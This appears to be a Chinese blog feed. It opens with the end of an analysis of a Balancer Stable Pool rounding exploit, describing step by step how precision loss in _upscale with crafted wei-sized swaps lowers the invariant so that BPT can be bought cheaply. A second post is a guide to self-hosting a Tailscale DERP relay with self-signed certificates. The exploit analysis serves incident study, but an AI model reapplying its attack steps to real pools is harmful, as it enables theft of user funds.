上面 _calculateInvariant函数里不变量公式的自变量为各个代币的余额，因变量为不变量 D。 这里为了计算出 D，_calculateInvariant 函数使用 Newton–Raphson 迭代公式 $D_{k+1} = D_k - \frac{f(D_k)}{f’(D_k)}$ 进行最多 256 次迭代来计算出 D 值，更具体的数学细节就不展开了，感兴趣的可以找 ChatGPT 老师做更多解释。

在计算出不变量 D 之后，_calcInGivenOut 函数基于上述不变量公式进行变换，得到以下新公式 $x^2 + \left( S_{\setminus x} + \frac{D}{A \cdot n^n} - D \right) x - \frac{D^{,n+1}}{A \cdot n^{2n} \cdot P_{\setminus x}} = 0$并尝试求解变量 x。其中：

$x$ ：表示当 tokenIn 流入之后 tokenIn 的新余额 (即$x=B_x + Amout_{in}$，而这个$Amount_{in}$就是 _calcInGivenOut 最终要求的值)。待计算的值。
$S_{\setminus x}$：表示除了 tokenX 以外剩余其他 token 余额的总和。
$P_{\setminus x}$：表示除了 tokenX 以外剩余其他 token 余额的总积。

这样，在计算出 tokenIn 的预期新余额之后，减去当前余额就能得到期望用户输入的 tokenIn 代币数 $Amout_{in}$。

那么 BPT 的价格该如何计算呢？ 看得出来 BPT 的价格与不变量 D 是正相关的，符合 $P_{BPT} = \frac{D}{S_{BPT}}$，其中$P_{BPT}$ 为 BPT 的价格，$S_{BPT}$ 为 BPT 的总供应量。但是要注意，虽然D名为不变量，但它并不代表是一成不变的，详见底下的代码注释，这里不再展开。

/**
 * @dev This function returns the appreciation of BPT relative to the underlying tokens, as an 18 decimal fixed
 * point number. It is simply the ratio of the invariant to the BPT supply.
 *
 * The total supply is initialized to equal the invariant, so this value starts at one. During Pool operation the
 * invariant always grows and shrinks either proportionally to the total supply (in scenarios with no price impact,
 * e.g. proportional joins), or grows faster and shrinks more slowly than it (whenever swap fees are collected or
 * the token rates increase). Therefore, the rate is a monotonically increasing function *as long as the tokens
 * in the pool do not lose value*.
 *
 * ...
 */
function getRate() external view virtual override returns (uint256) {
    // We need to compute the current invariant and actual total supply. The latter includes protocol fees that have
    // accrued but are not yet minted: in calculating these we'll actually end up fetching most of the data we need
    // for the invariant.

    (
        uint256[] memory balances,
        uint256 virtualSupply,
        uint256 protocolFeeAmount,
        uint256 lastJoinExitAmp,
        uint256 currentInvariantWithLastJoinExitAmp
    ) = _getSupplyAndFeesData();

    // Due protocol fees will be minted at the next join or exit, so we can simply add them to the current virtual
    // supply to get the actual supply.
    uint256 actualTotalSupply = virtualSupply.add(protocolFeeAmount);

    // All that's missing now is the invariant. We have the balances required to calculate it already, but still
    // need the current amplification factor.
    (uint256 currentAmp, ) = _getAmplificationParameter();

    // It turns out that the process for due protocol fee calculation involves computing the current invariant,
    // except using the amplification factor at the last join or exit. This would typically not be terribly useful,
    // but since the amplification factor only changes rarely there is high probability of its current value being
    // the same as it was in the last join or exit. If that is the case, then we can skip the costly invariant
    // computation altogether.
    uint256 currentInvariant = (currentAmp == lastJoinExitAmp)
        ? currentInvariantWithLastJoinExitAmp
        : StableMath._calculateInvariant(currentAmp, balances);

    // With the current invariant and actual total supply, we can compute the rate as a fixed-point number.
    return currentInvariant.divDown(actualTotalSupply);
}

3. 攻击流程

在第一小节里我们提到了如果传入了一个极小值给 _upscale 函数，那么其计算结果会出现较大的精度损失，但我们仍然还没搞清楚是如何通过这个几 wei 的极小值来窃取大额资金的。第二小节里我们详细了解了 Stable Pool 的不变量公式以及 BPT 价格的计算方式。

回顾一下：

Stable Pool 的数学模型表现为常和与常积的结合，即在锚定价格附近表现为 x + y = k，偏离锚定价格较远的位置则表现为 x * y = k。
不变量D的计算是通过各个 token 的 balance 来得到的，那么不变量 D 一定和各个 token 的 balance 呈正相关。这个很容易证明，当有 LP 注入流动性的时候 token balance 增加，那么 D 也要增加以对应新增发的 BPT，反之如果 LP 撤离流动性则 token balance 降低，D 也应该随之变小。
BPT 价格是由不变量 D 和当前总供应量得到。在总供应量不变的情况下如果能通过漏洞把 D 降低那么就能以比正常价格低的价格来兑换 BPT。

那么攻击思路就开始逐渐清晰了：在每次 Swap 时，不变量 D 的计算都是由 token balance 来计算得到。如果能通过这种细微的 token balance 计算的精度丢失，使得不变量 D 的计算被压小（在 BPT 总供应量不变的前提下），那么攻击者就可以以较低的价格来购买 BPT，因为 BPT 价格受到不变量 D 的直接影响。

Arbitrum 上的示例攻击交易展示了攻击的全流程，我们可以发现攻击者正是通过 _upscale 函数精度损失，使得 D 的计算偏离正常值，进而影响 BPT 价格来进行攻击。具体来说，攻击的流程是这样的。

流动性操纵。Balancer batchSwap 允许临时借用内部余额，因此攻击者首先借用了 Balancer 中该 Pool 的 BPT，进而使用这些 BPT 去换取底层的 rETH/cbETH/wstETH 等资产代币。使得这些本来余额为 1e18 数量级的代币，在经过大量兑换之后池子里只剩下 1e11 级别的数量：
上图中 TokenIn 为 wstETH/rETH/cbETH 的这个其实就是该池子的 BPT（因为 BPT 的地址就是该池子的地址）。从图上可以看到从上到下每次兑换底层资产的数量级依次递减，直到最后 swap 的数量低于 100wei。从余额变动来看，最开始进行 swap 时代币的数量分别为：
- cbETH: 385e18 (385,331,897,945,415,101,145)
- BPT: 2.45e18 + 2^11 (2,596,148,429,267,416,263,499,288,948,276,786)
- wstETH: 36.4e18 (36,378,350,238,858,588,950)
- rETH: 41.3e18 (41,301,528,246,890,260,702)
注：BPT 余额中 2^11 部分为 _PREMINTED_TOKEN_BALANCE，详见代码。
而在完成流动性操纵之后最终的代币数量分别为：
- cbETH: 1.00e11 (100,000,000,000)
- BPT: 501.96e18 + 2^11 (2,596,148,429,267,915,775,463,860,923,420,341)
- wstETH: 1.00e11 (100,000,000,000)
- rETH: 1.00e11 (100,000,000,000)
通过舍入漏洞频繁压低不变量 D。这一步骤只涉及到 wstETH/cbETH 交易。攻击者通过重复多次以下 swap 步骤来达到目的：
1. wstETH→cbETH: 这一步将耗尽 wstETH 流动性，使得流动性从较高的 1e11 降低为 9 这个临界值。
2. wstETH→cbETH: 这一步使用精心构建的 amount = 8，触发 upscale 的精度损失。 此时 cbETH 的 token rate 为 1.114。因此在计算不变量 D 之前，upscale 会计算 balance(8) * rate(1.114) = value(8.912) 并截断为 8。这样一来，在计算不变量 D 时，由于使用的 token balance 为截断后的 value，因此所计算出来的 D 的值将会被恶意下压。
3. cbETH→wstETH: 在完成上一步的步骤将 D 向下压缩之后，这一步的 swap 只是将 wstETH 的流动性从 1 恢复为例如 5642 这种较高值，以准备下一次执行 a 步骤。
由于已经通过多次舍入攻击把不变量 D 压的很小，因此攻击者可以以较低价格来回购 BPT，用以偿还从 Vault 的 batchSwap 里借用的内部余额。而 BPT 的前后价格差就是攻击者窃取金额的关键。下图展示了攻击者花费底层代币 cbETH/wstETH/rETH 回购 BPT 的交易过程，这里攻击者每次回购 BPT 的数量呈指数级上升，用于快速回购回最开始从 Vault 借入的用于枯竭掉 Pool 流动性所花费的 BPT。

四、参考链接

浅探 Tailscale DERP 中转服务

2023-11-13T16:00:00.000Z

一、简介

tailscale 是一个很好用的工具，它包含了多种高级特性（例如 Magic DNS）来方便用户的使用，主要用于异地组网。

这也是本人抛弃 Zerotier 选择 Tailscale 的缘故，高级特性很多用的很方便。

tailscale 的底层机制与 zerotier 不同。

zerotier 会让每个客户端在启动时立即尝试与其他客户端的打洞，并一直维持这个连接。
- 优点：创建链接时可以非常快速。要么早已打洞完成，要么就是百分百确定走中继节点。
- 缺点：需要维护与所有对等节点的打洞链接，占用资源。节点一多则维护打洞的开销就比较大。
tailscale 只会在需要与 peer 建立连接的时候才会尝试打洞，而且最开始的流量一定是会经过 DERP 中转服务器。（非常的 Lazy…）
- 优点：懒加载机制无需预先维护与其他节点的任何打洞连接，无需预先维护任何状态。
- 缺点：每次通过 tailscale 创建虚拟连接时，初始所创建的连接其延迟很高，这会极大的影响使用体验；tailscale 极其依赖中继节点。

而在 P2P VPN 中，自建中继节点是相当重要的。一方面自建中继节点可以比地理位置较远的官方中继节点更好的观察和协调本地两台对等机的 p2p 过程，另一方面可以在打洞失败后快速中继和转发流量。

本人先前的文章已经介绍了 Zerotier 搭建中继节点 Moon 的原理和过程。Zerotier 会在特定 Primary Port 9993 上监听 UDP 连接来中继数据，因此在实际搭建的过程中只需将这一个 UDP 端口暴露至公网即可，要求极低。而暴露端口有多种方式可以实现，例如内网穿透 FRP 等等，也因此 moon 节点甚至都不需要有一个属于自己 IP 地址。

注：Zerotier 不支持自建 TCP 中继，moon 节点实际上只是一个 UDP 中继节点。

而 Tailscale 的中继服务器（称为 DERP 服务）的搭建与 zerotier 相比存在一点困难，而网络上的搭建教程真是参差不齐（跟我之前找 Zerotier Moon 的搭建过程一样难顶，这点要狠狠吐槽一下）。那么接下来，我们来尝试找到一种最简便的方式来构建 tailscale DERP 服务器，顺带学习一下 DERP 服务的一些原理。

Tailscale 的中继 DERP 服务就是一个 TCP 中继节点，与 Zerotier 完全相反。

TL,DR: 如想跳过前置内容，直接快速了解搭建过程，请直接跳转至本文最后一节的总结部分。

看完本文，你将了解到无需公网机器、无需域名、无需证书、无需修改源代码、无需自托管 HeadScale 服务的情况下，只需1-2个端口，来快速构建 Tailscale-DERP 服务。

需要注意的是本篇文章只考虑 tailscale 而不考虑 headscale，因为我希望使用的过程中能够尽可能简便，不想单独部署一个 headscale 控制服务器。

二、初探 DERP 服务的初始要求

Tailscale 官方文档说明了 DERP 服务器需要满足一些要求：

需要能够公网访问。这是为了让各个 Tailscale 节点可以直接访问到该 DERP 服务器，以此来便于进行后续的流量转发等操作。这个要求非常正常。
需要运行 HTTPS 服务。本质上是为了在传输数据给 DERP 服务器时数据可以通过 TLS 加密。
HTTPS 服务通常需要 带有一个 TLS 证书。DERP 服务器只认 Let‘ s Encrypt 这家服务商颁发的证书，但该服务商不会给纯 IP 的服务器颁发证书。这实际上就隐含了一个条件：还需要一个公共域名。
这里的 TLS 加密和 Tailscale P2P 加密不同，前者是加密 peer to server 的流量，后者是加密 peer to peer 的流量。换句话说，TLS 要加密的数据中会包含（已经被 tailscale peer 加密过的）待中继加密流量。
必须分配 80 端口来运行 HTTP 服务。这个要求很强烈，限制死了端口。
需要额外暴露两个端口来运行 HTTPS 和 STUN 服务。
必须允许 ICMP 流量的出入。Tailscale Document 中用的是 must 来指定其重要性，但个人感觉应该是不需要这个要求。

上面从文档中总结出来的几点要求可能不太准确，因为网络中有部分文章介绍了搭建纯 IP DERP 服务器的过程（但是还是什么介绍都没有，看了跟没看没什么两样……）。不过从我阅读代码得到的经验看来官方文档上这方面内容很有可能已经过时，实际应该不需要这么强的要求。

需要注意的是 DERP 服务要求服务器上需要携带 TLS 证书主要还是出于数据加密的目的；但在 Tailscale 节点中，两个节点在传输数据前会使用各个节点事先已经上传至 Tailscale 中心节点（即协调服务器）里的公钥来做加密。因此，DERP服务器要求的 TLS 证书的实际作用是为了隐藏数据转发的这个行为本身。由于本人自建节点主要是自己使用，因此这个隐藏就显得比较无所谓。

那么这样一来就有一个有意思的问题：

能否在最少操作、最少要求的情况下来做 DERP 中继？

那这就要深入到 DERP 的实现原理了。

三、初探 DERP 原理

当前使用的 tailscale 版本为 v1.52.1 (2023/11/11)，git commit 为 86c8ab75.

1. DERP 配置相关

DERP 的顶层实现主要由两个文件组成

cmd/derper/derper.go：DERP 服务器的顶层入口，包括监听 STUN 服务的过程逻辑全在这里
derp/derp_server.go：中继转发数据的相关操作类代码

从 DERP 服务器的代码中可以收获一些有意思的东西：

DERP 服务器可以同时运行两个服务，一个是使用 HTTP/HTTPS（TCP 协议）的 DERP 数据中转服务；另一个是使用 UDP 协议的 STUN 打洞服务。
这俩服务刚好使用了不同的运输层协议，所以应该可以把 Zerotier 那套机制拿过来用。
所绑定的 IP、HTTP/HTTPS（DERP 服务）监听端口、选择指定 HTTP 还是 HTTPS 协议、以及 STUN 监听端口都是可配置的，灵活性很好。
可以指定参数 verify-clients 来限制使用当前 DERP 服务的只能是自己的 tailscale 节点，防止白嫖。不过启用该服务需要当前 DERP 服务器本身就是一个 tailscale 节点，或者存在 socket 文件 /var/run/tailscale/tailscaled.sock。

// cmd/derper/derper.go

var (
dev        = flag.Bool("dev", false, "run in localhost development mode (overrides -a)")
addr       = flag.String("a", ":443", "server HTTP/HTTPS listen address, in form \":port\", \"ip:port\", or for IPv6 \"[ip]:port\". If the IP is omitted, it defaults to all interfaces. Serves HTTPS if the port is 443 and/or -certmode is manual, otherwise HTTP.")
httpPort   = flag.Int("http-port", 80, "The port on which to serve HTTP. Set to -1 to disable. The listener is bound to the same IP (if any) as specified in the -a flag.")
stunPort   = flag.Int("stun-port", 3478, "The UDP port on which to serve STUN. The listener is bound to the same IP (if any) as specified in the -a flag.")
configPath = flag.String("c", "", "config file path")
certMode   = flag.String("certmode", "letsencrypt", "mode for getting a cert. possible options: manual, letsencrypt")
certDir    = flag.String("certdir", tsweb.DefaultCertDir("derper-certs"), "directory to store LetsEncrypt certs, if addr's port is :443")
hostname   = flag.String("hostname", "derp.tailscale.com", "LetsEncrypt host name, if addr's port is :443")
runSTUN    = flag.Bool("stun", true, "whether to run a STUN server. It will bind to the same IP (if any) as the --addr flag value.")
runDERP    = flag.Bool("derp", true, "whether to run a DERP server. The only reason to set this false is if you're decommissioning a server but want to keep its bootstrap DNS functionality still running.")

meshPSKFile    = flag.String("mesh-psk-file", defaultMeshPSKFile(), "if non-empty, path to file containing the mesh pre-shared key file. It should contain some hex string; whitespace is trimmed.")
meshWith       = flag.String("mesh-with", "", "optional comma-separated list of hostnames to mesh with; the server's own hostname can be in the list")
bootstrapDNS   = flag.String("bootstrap-dns-names", "", "optional comma-separated list of hostnames to make available at /bootstrap-dns")
unpublishedDNS = flag.String("unpublished-bootstrap-dns-names", "", "optional comma-separated list of hostnames to make available at /bootstrap-dns and not publish in the list")
verifyClients  = flag.Bool("verify-clients", false, "verify clients to this DERP server through a local tailscaled instance.")

acceptConnLimit = flag.Float64("accept-connection-limit", math.Inf(+1), "rate limit for accepting new connection")
acceptConnBurst = flag.Int("accept-connection-burst", math.MaxInt, "burst limit for accepting new connection")
)

这些信息说明 DERP 的可配置性很高，且对 TLS 的要求是可选的。不过只知道 DERP 服务可以选择开启 HTTP 协议还不够用，我们还需要看看各个客户端节点是如何配置与使用 DERP 服务的，因为假如客户端节点强制启用 TLS 访问 DERP 服务，那即便关掉 DERP 服务的 TLS 也无济于事。

http-port 参数只会在启用了 HTTPS 服务后，才会尝试监听新的 HTTP 服务（cmd/derper/derper.go#L284）。这意味着 HTTP 服务实际上不是必须的，官方文档里所提出的要求存在冗余。

2. DERP Client 配置相关

代码 tailcfg/derpmap.go 展现了下发至 client 上关于 derp 服务的配置信息：

// tailcfg/derpmap.go

// DERPNode describes a DERP packet relay node running within a DERPRegion.
type DERPNode struct {
// Name is a unique node name (across all regions).
// It is not a host name.
// It's typically of the form "1b", "2a", "3b", etc. (region
// ID + suffix within that region)
Name string

// RegionID is the RegionID of the DERPRegion that this node
// is running in.
RegionID int

// HostName is the DERP node's hostname.
//
// It is required but need not be unique; multiple nodes may
// have the same HostName but vary in configuration otherwise.
HostName string

// CertName optionally specifies the expected TLS cert common
// name. If empty, HostName is used. If CertName is non-empty,
// HostName is only used for the TCP dial (if IPv4/IPv6 are
// not present) + TLS ClientHello.
CertName string `json:",omitempty"`

// IPv4 optionally forces an IPv4 address to use, instead of using DNS.
// If empty, A record(s) from DNS lookups of HostName are used.
// If the string is not an IPv4 address, IPv4 is not used; the
// conventional string to disable IPv4 (and not use DNS) is
// "none".
IPv4 string `json:",omitempty"`

// IPv6 optionally forces an IPv6 address to use, instead of using DNS.
// If empty, AAAA record(s) from DNS lookups of HostName are used.
// If the string is not an IPv6 address, IPv6 is not used; the
// conventional string to disable IPv6 (and not use DNS) is
// "none".
IPv6 string `json:",omitempty"`

// Port optionally specifies a STUN port to use.
// Zero means 3478.
// To disable STUN on this node, use -1.
STUNPort int `json:",omitempty"`

// STUNOnly marks a node as only a STUN server and not a DERP
// server.
STUNOnly bool `json:",omitempty"`

// DERPPort optionally provides an alternate TLS port number
// for the DERP HTTPS server.
//
// If zero, 443 is used.
DERPPort int `json:",omitempty"`

// InsecureForTests is used by unit tests to disable TLS verification.
// It should not be set by users.
InsecureForTests bool `json:",omitempty"`

// STUNTestIP is used in tests to override the STUN server's IP.
// If empty, it's assumed to be the same as the DERP server.
STUNTestIP string `json:",omitempty"`

// CanPort80 specifies whether this DERP node is accessible over HTTP
// on port 80 specifically. This is used for captive portal checks.
CanPort80 bool `json:",omitempty"`
}

我们既可以指定客户端在连接 DERP 服务器时所使用关于 DERP 服务和 STUN 服务的监听端口，也可以通过测试用的参数来让客户端在连接 DERP 服务器时指定是否启用 TLS 验证（即指定是否使用 TLS 证书）。管中窥豹，看上去好像客户端这块可配置性也比较强。

不过注意：从 DERP Client 的配置文件只能看出可以尝试用 TLS-Insecure 来连接 DERP 服务器的 HTTPS 服务，并没有说明可以直接连接 DERP 服务器的 HTTP 服务。这个需要继续探究。

3. DERP 服务连接逻辑

那么 tailscale 节点是如何实际与 DERP 服务器进行交互的呢？需要关注这三个文件，层次依次从高到低：

wgengine/magicsock/magicsock.go：关键函数 sendAddr 支持向 DERP 服务器或直连 peer 发送单个数据包。该文件整体上提供了更新 endpoints、维护网络状态、发送与接收数据包的顶层实现、打洞路径探索等更为高层的功能特性。
wgengine/magicsock/derp.go：该文件中的关键主要函数为 derpWriteChanOfAddr，创建与单个 DERP 服务器的复杂连接，并进行信息(message) 处理。
derp/derphttp/derphttp_client.go：实现了底层与 DERP 服务器实际监听、连接、发送与接收数据(data) 等底层操作。

这些文件里面内容较多，就不细讲了，自己看看会更能感受到其中的内在精妙。

我们主要关注的是最后一个文件，因为底层操作才是影响我们能否用 non-TLS 协议创建连接的关键位置（即 HTTP 协议，毕竟要是能走 HTTP，那就没必要走关闭证书验证的伪 HTTPS 协议）。

正常情况下，tailscale 都只会与同个 Region 中的其中一个节点进行连接和通信，即便单个 Region 里存在多个冗余节点，tailscale 也只会连接其中一个：

客户端尝试创建 DERP Region Client：derpWriteChanOfAddr 函数 - wgengine/magicsock/derp.go#L321
实际创建 DERP Region 的 Client 结构体：NewRegionClient 函数 - derp/derphttp/derphttp_client.go#L109
客户端向 DERP Region 发起连接，获取 TCP 连接（注意不是 TLS 连接）：dialRegion 函数 - derp/derphttp/derphttp_client.go#L570

在获取 DERP Region 的 TCP 连接后，根据条件判断选择是否使用 HTTPS 协议：derp/derphttp/derphttp_client.go#L392 & derp/derphttp/derphttp_client.go#L426

以下代码先走 switch-case 的 default 分支，之后进入 c.useHTTPS() 语句判断当前是否使用 HTTPS 协议进行连接。

func (c *Client) connect(ctx context.Context, caller string) (client *derp.Client, connGen int, err error) {
...

var node *tailcfg.DERPNode // nil when using c.url to dial
switch {
case useWebsockets():
...
case c.url != nil:
c.logf("%s: connecting to %v", caller, c.url)
tcpConn, err = c.dialURL(ctx)
default:
c.logf("%s: connecting to derp-%d (%v)", caller, reg.RegionID, reg.RegionCode)
tcpConn, node, err = c.dialRegion(ctx, reg)
}
if err != nil {
return nil, 0, err
}

...

var httpConn net.Conn        // a TCP conn or a TLS conn; what we speak HTTP to
var serverPub key.NodePublic // or zero if unknown (if not using TLS or TLS middlebox eats it)
var serverProtoVersion int
var tlsState *tls.ConnectionState
if c.useHTTPS() {
tlsConn := c.tlsClient(tcpConn, node)
httpConn = tlsConn

// Force a handshake now (instead of waiting for it to
// be done implicitly on read/write) so we can check
// the ConnectionState.
if err := tlsConn.Handshake(); err != nil {
return nil, 0, err
}
...
}
...
}

Client.useHTTPS 函数就是客户端用来判断连接 DERP 服务器时是否需要使用 HTTPS 协议，从下面的代码中可以得知，当客户端连接 DERP 服务器时，它几乎一定会使用 HTTPS 协议。很简单，因为 DERP Region Client 的 url 字段是空的，除非启动调试参数，否则它就会使用 HTTPS。

手动在运行 DERP 服务时启用调试参数/修改源代码是比较 dirty 的，个人不太倾向这种操作，尽量能不改代码就尽量不改代码。因此这里我选择启用 HTTPS 协议算了。

// derp/derphttp/derphttp_client.go
// --------------------------------

// Client is a DERP-over-HTTP client.
//
// It automatically reconnects on error retry. That is, a failed Send or
// Recv will report the error and not retry, but subsequent calls to
// Send/Recv will completely re-establish the connection (unless Close
// has been called).
type Client struct {
...

// Either url or getRegion is non-nil:
url       *url.URL
getRegion func() *tailcfg.DERPRegion

...
}
...

// debugDERPUseHTTP tells clients to connect to DERP via HTTP on port
// 3340 instead of HTTPS on 443.
var debugUseDERPHTTP = envknob.RegisterBool("TS_DEBUG_USE_DERP_HTTP")

func (c *Client) useHTTPS() bool {
if c.url != nil && c.url.Scheme == "http" {
return false
}
if debugUseDERPHTTP() {
return false
}

return true
}

那么现在下结论：在正常情况下，DERP 中继服务一定走（可以不经过 TLS 验证的）HTTPS 协议。

顺带讲一下 derphttp.Client 中 url 字段能否为 http。唯一一个创建带有 url 字段 Client 结构的函数的调用点如下，从中可以看到，URL 的 scheme 已经被限制死为 https 了，这个功能应该是给 tailscale 官方域名使用，因此对我们来讲用处其实不大：

// cmd/derper/mesh.go
func startMeshWithHost(s *derp.Server, host string) error {
logf := logger.WithPrefix(log.Printf, fmt.Sprintf("mesh(%q): ", host))
c, err := derphttp.NewClient(s.PrivateKey(), "https://"+host+"/derp", logf)
if err != nil {
return err
}
...
}

4. WebSocket

我在阅读 DERP 代码时，发现它也支持中继 websocket 流量，这引起了我的好奇。

在最初的时候，我以为 DERP 是通过 HTTPS 的 websocket 来中继流量。但经过一番消息查阅和代码阅读，发现事情其实并非这样，而是 tailscale 也支持 p2p 的 websocket 通信。

开发者尝试让 Tailscale 可以运行在浏览器中，这个就有点意思了。那么目前有哪些有意思的浏览器项目可以和 Tailscale 结合呢？我发现了这个 - How we added full networking to WebVM via Tailscale

一句话描述：WebVM 是一个运行在浏览器中的小且精的 Linux VM，tailscale 和 WebVM 一拍即合使得我们可以在浏览器中通过 WebVM 直接访问我们的 tailscale 网络。

这个东西极大的引起了我的好奇心，因为我一直在想要不要单独给机器暴露一个端口用来搭建 Web ssh，以便于在陌生机器上仍然能够访问我的 tailscale 网络。

而现在，我便可以通过浏览器上的 WebVM，使用 ssh 连接进远程机器进行操作，完美满足我的要求，非常的 nice。

截一个使用示例，非常的有趣。WebVM 地址为 https://webvm.io/

在 WebVM 会话存活时， tailscale 网络中会临时加入这台 VM，在该会话死亡时自动从 tailscale 网络中清除：

但比较悲伤的是，WebVM 中的 tailscale 还不太支持 MagicDNS，也就是说得手输入 IP 地址连接远程机器了，没法用主机名。

5. STUN 服务

STUN 是用来进行 NAT 检测的服务。理论上说，将 STUN 放到与两台 peer 越近的位置越好，因为这能减少 NAT穿透的层数。但 STUN 原始协议要求 STUN server 至少拥有两个公网 IP 才能做到非常完备的 NAT 协议检测，因为两个公网 IP 可以让 STUN server 有两个流量出站口，便于模拟出“两台”设备来更好的检测 peer 的 NAT 类型。

但这种条件未免过于苛刻，一个公网 IP 都不太容易拿到，更何况是两个公网 IP，而且还得是两个公网 IP 都绑定在一个设备上，难上加难。不过好消息是 Tailscale 的 stun 并不需要这么高的要求，它的 STUN UDP 服务只做一件事：接受 peer 的 UDP 连接，并告诉 Peer 当前所看到 NAT 的 IP:Port 对:

// cmd/derper/derper.go
func serverSTUNListener(ctx context.Context, pc *net.UDPConn) {
...
for {
// 1. 从 UDP 连接中读取 pkt
n, ua, err = pc.ReadFromUDP(buf[:])
if err != nil {
...
continue
}
// 2. 将 pkt 解析成 txid，主要是防止消息错位
pkt := buf[:n]
...
txid, err := stun.ParseBindingRequest(pkt)
...
// 3. 将 Server 从 UDP 连接中看到的公网 IP:Port，与 txid 打包发回给 client
addr, _ := netip.AddrFromSlice(ua.IP)
res := stun.Response(txid, netip.AddrPortFrom(addr, uint16(ua.Port)))
_, err = pc.WriteTo(res, ua)
...
}
}

这里的 STUN 服务非常简单，它只做了整个 NAT 检测中最简单的一环，那就是告诉 client 来自 server 的公网视角。

但打洞没有这么简单，Tailscale 还会基于 DERP 服务的 discovery message 旁路信道 + 其他 NAT 检测的黑科技来做 NAT 穿越。

这里就得插一个 Tailscale blog 链接了，最好是点进去看：How NAT traversal works NAT - Tailscale Blog，不过我更推荐看这个译文：[译] NAT 穿透是如何工作的：技术原理及企业级实践（Tailscale, 2020）- arthurchiao’s blog，讲的非常的通俗易懂。

这里不打算介绍 Tailscale 打洞的一整套逻辑，因为关注点还是在于建立 DERP 服务，具体细节可以看上面的文章，而且因为过于黑科技以至于想简短讲完不太可能。不过在这里提到了 STUN 服务只是想说明 Tailscale 的 STUN 服务只需要一个开放的 UDP 端口即可，再没有其他苛刻的条件了。

四、DERP 测试搭建

1. 安装 derper 服务

# 去 https://go.dev/dl/ 下载最新版（一定要下载版本，而非 apt-get install golang）
wget https://go.dev/dl/go1.21.3.linux-amd64.tar.gz
rm -rf /usr/local/go && tar -C /usr/local -xzf go1.21.3.linux-amd64.tar.gz
rm go1.21.3.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

# 确定安装是否成功 
go version
# 查看 GOROOT 和 GOPATH 是否不为空 & 可访问
go env

# 配置 go 代理并安装
go env -w GOPROXY=https://goproxy.cn,direct
go install tailscale.com/cmd/derper@latest
# 安装 derp probe 协助测试 derper
go install tailscale.com/cmd/derpprobe@latest

2. 创建自签名证书

创建自签名证书主要是糊弄 derper 用的，让它运行 HTTPS 服务；也可以改 derper 代码来绕过这个限制，但这么做后续也不方便更新 derper。

创建自签名证书有几个注意点：

先随便想一个 HostName，这里我想的是 kiprey-derp。但是要注意这个 HostName 一定要记住，后面证书签名包括请求访问等等都会用到。
证书生成后，私钥文件和证书文件名的前缀都要改为 HostName。

mkdir ~/certdir && cd ~/certdir
# 1. 生成私钥
$ DERP_HOST="kiprey-derp"
$ openssl genpkey -algorithm RSA -out ${DERP_HOST}.key   
...

# 2. 生成证书请求 (CSR)：
$ openssl req -new -key ${DERP_HOST}.key -out ${DERP_HOST}.csr
# 一路放空按 enter 即可。

# 3. 生成自签名证书，设置过期期限为 100 年，防止后续再重新操作
$ openssl x509 -req \
-days 36500 \
-in ${DERP_HOST}.csr \
-signkey ${DERP_HOST}.key \
-out ${DERP_HOST}.crt \
-extfile <(printf "subjectAltName=DNS:${DERP_HOST}")

# 4. 查看生成的证书
$ openssl x509 -in ${DERP_HOST}.crt -noout -text 
Certificate:
    Data:
        Version: 3 (0x2)
        ...
        Issuer: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
        Validity
            Not Before: Nov 12 05:17:34 2023 GMT
            Not After : Oct 19 05:17:34 2123 GMT
        Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
        ...
        X509v3 extensions:
            X509v3 Subject Alternative Name: 
                DNS:kiprey-derp
            ...
    ...

3. 运行 derper 服务

# 启动 derper
# 因为 derp 在启用 HTTPS 后会自动监听 HTTP，所以指定 HTTP PORT 为 -1 将其禁用
~/go/bin/derper \
    -c ~/.derper.key \
    -a :8888 -http-port -1 \
    -stun-port 8889 \
    -hostname ${DERP_HOST} \
    --certmode manual \
    -certdir ~/certdir \
    --verify-clients

4. 测试连通性

以下是 HTTPS 协议 DERP 服务的连通性测试过程：

unset all_proxy http_proxy https_proxy
# --insecure 表示使用 TLS-Insecure
# --resolve 表示将 DERP_HOST 绑定至本地的  127.0.0.1
$ curl --insecure --resolve "${DERP_HOST}:8888:127.0.0.1" "https://${DERP_HOST}:8888"

DERP

  This is a
  "https://tailscale.com/">Tailscale
  "https://pkg.go.dev/tailscale.com/derp">DERP
  server.

Debug info at '/debug/'>/debug/.

# 测试 UD 协议 STUN 服务的连通性
$ nc 127.0.0.1 8889 -v -u
Connection to 127.0.0.1 8889 port [udp/*] succeeded!

测试的时候一定要关闭代理！不然访问 localhost 就会走代理，导致：
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

需要注意的是，在访问 DERP 的 HTTPS 服务时，只能用之前指定的 DERP_HOST 这个 HostName 来进行访问，因为 DERP 服务会对 Client 的连接进行校验，确保 Client 发送来的 ServerName 与本地证书的 HostName 一致：

// cmd/derper/derper.go
// --------------------
func main() {
...
if serveTLS {
log.Printf("derper: serving on %s with TLS", *addr)
var certManager certProvider
certManager, err = certProviderByCertMode(*certMode, *certDir, *hostname)
if err != nil {
log.Fatalf("derper: can not start cert provider: %v", err)
}
httpsrv.TLSConfig = certManager.TLSConfig()

    // 1. 会在 Client 连接时尝试从 Client Hello 信息中获取证书
getCert := httpsrv.TLSConfig.GetCertificate
httpsrv.TLSConfig.GetCertificate = func(hi *tls.ClientHelloInfo) (*tls.Certificate, error) {
cert, err := getCert(hi)
if err != nil {
return nil, err
}
cert.Certificate = append(cert.Certificate, s.MetaCert())
return cert, nil
}
    ...
...
}

// cmd/derper/cert.go
// ------------------
func (m *manualCertManager) getCertificate(hi *tls.ClientHelloInfo) (*tls.Certificate, error) {
// 2. 在获取证书时会先判断 Client 请求的 ServerName 是否与本地指定的 hostname 一致
  if hi.ServerName != m.hostname {
return nil, fmt.Errorf("cert mismatch with hostname: %q", hi.ServerName)
}

// Return a shallow copy of the cert so the caller can append to its
// Certificate field.
certCopy := new(tls.Certificate)
*certCopy = *m.cert
certCopy.Certificate = certCopy.Certificate[:len(certCopy.Certificate):len(certCopy.Certificate)]
return certCopy, nil
}

因此在测试的时候，如果是使用 curl 访问则需要指定 --resolve 参数，来让发往 DERP_HOST 的请求最终能 resolve 到本地地址：

curl --insecure --resolve "${DERP_HOST}:8888:127.0.0.1" “https://${DERP_HOST}:8888”

如果我们直接用浏览器打开的话，页面还是比较简洁的：

注：想用浏览器打开该 HTTPS 服务，要么做地址绑定，要么再建一个 DERP_HOST=localhost 的证书，此处不再赘述。

